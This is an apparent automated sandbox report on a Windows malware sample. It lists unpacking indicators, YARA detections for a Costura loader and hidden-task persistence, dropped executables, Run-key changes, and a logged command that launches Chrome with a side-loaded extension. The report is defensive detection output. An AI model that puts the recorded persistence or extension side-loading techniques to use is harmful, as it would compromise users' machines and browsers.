Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Lwbtkgrhgw.pdb source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: Hider.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WERD304.tmp.dmp.9.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: zlONcFaXkc.exe, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b593b8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b31380.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b593b8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9c49428.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1c40000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9b31380.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1675426228.000001DFC1C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR

Binary contains a suspicious time stamp

Source: zlONcFaXkc.exe

Static PE information: 0x89B686F2 [Fri Mar 20 05:04:50 2043 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8AEF50 push cs; ret	0_2_00007FFD9B8AEF53
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9BA520A2 push eax; ret	0_2_00007FFD9BA520A3
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8C6B00 push eax; iretd	1_2_00007FFD9B8C6DCD
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8C6C69 push eax; iretd	1_2_00007FFD9B8C6DCD
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D8169 push ebx; ret	1_2_00007FFD9B8D816A
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B88EF50 push cs; ret	1_2_00007FFD9B88EF53
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3792B push ebx; retf	1_2_00007FFD9BA3796A
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_00007FFD9B87095B push ebp; retf	2_2_00007FFD9B870961
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_00007FFD9B87126D push E95E53B6h; ret	2_2_00007FFD9B871299
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_00007FFD9B87096C push ebp; retf	2_2_00007FFD9B87096E

Source: zlONcFaXkc.exe	Static PE information: section name: .text entropy: 7.997352220653475
Source: Target.exe.0.dr	Static PE information: section name: .text entropy: 7.997352220653475

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.1665987392.000001DFA7B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR

Drops PE files

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	File created: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	File created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe			Jump to dropped file

Installs a Chrome extension

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"			Jump to behavior

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.1665987392.000001DFA7B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a 9F06F2D0565EA31B8A486D63B122AF45

Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
